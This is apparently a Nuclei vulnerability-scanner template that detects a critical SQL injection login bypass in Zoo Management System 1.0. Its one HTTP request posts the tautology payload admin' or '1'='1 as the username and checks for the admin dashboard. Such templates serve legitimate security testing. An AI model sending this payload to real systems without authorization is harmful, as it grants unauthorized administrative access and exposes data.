id: zms-sqli info: name: Zoo Management System 1.0 - SQL Injection author: arafatansari severity: critical description: | Zoo Management System 1.0 contains a SQL injection vulnerability via the username parameter on the login page. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. reference: - https://www.exploit-db.com/exploits/48880 - https://packetstormsecurity.com/files/167572/Zoo-Management-System-1.0-Cross-Site-Scripting.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-89 metadata: verified: true tags: edb,packetstorm,zms,sqli,auth-bypass,cms requests: - raw: - | POST /admin/index.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username=admin%27+or+%271%27%3D%271&password=any&login= host-redirects: true max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - 'ZMS ADMIN' - 'Dashboard' - 'Zoo Management System' condition: and - type: status status: - 200 # Enhanced by mp on 2022/09/28